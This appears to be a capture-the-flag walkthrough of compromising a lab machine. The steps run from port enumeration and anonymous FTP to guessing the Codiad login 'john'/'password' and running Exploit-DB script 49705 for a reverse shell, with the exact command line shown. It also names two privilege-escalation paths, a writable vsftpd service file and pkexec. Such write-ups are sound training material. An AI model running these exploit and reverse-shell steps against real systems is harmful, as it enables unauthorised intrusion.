Exploited using https://www.exploit-db.com/exploits/49705
.bash_history file inside /home/drac directory contains the password for the user drac
Following observations for privilege escalation from drac
drac can run the following command with sudo – /usr/sbin/service vsftpd restart
drac can write to the vsftpd.service file – /lib/systemd/system/vsftpd.service
/etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf contains AdminIdentities=unix-group:sudo;unix-group:admin (Default in Ubuntu)
Privilege Escalation – Option 1: modifying the vsftpd service
Privilege Escalation – Option 2: pkexec
All Done!
Enumeration
Nmap and Rustscan showed that the following ports are open:
21/ftp
22/ssh
80/http
62337/http
Nmap results also revealed that anonymous logon is allowed for FTP. Therefore we logged in to FTP to see if we can gain any useful information.
As seen in the screenshots above, we found a file named - , which contained a note to john stating that password has been reset to default, as requested.
We made a note of the information received above and moved onto enumerating other services.
Running GoBuster on port 80 didn’t bring anything useful.
However, when browsing to port 62337, we found that the application running was Codiad 2.8.4
Searching for exploits: searchsploit Codiad 2.8.4, we found that there are three RCE exploits available. However, all of them required authentication
Since we needed authentication for any of the exploits to work, our main goal was to be authenticated
Recalling the note obtained from FTP, we searched for Codiad’s default credentials, no luck.
Since the note mentioned the user john, we tried some common passwords against the user john and it worked.
The password for john was password
As we could authenticate to the application, we tried using the first exploit to get a reverse shell.
Commands Used
searchsploit -m 49705
python3 49705.py http://10.10.213.56:62337/ john password 10.9.4.47 1234 linux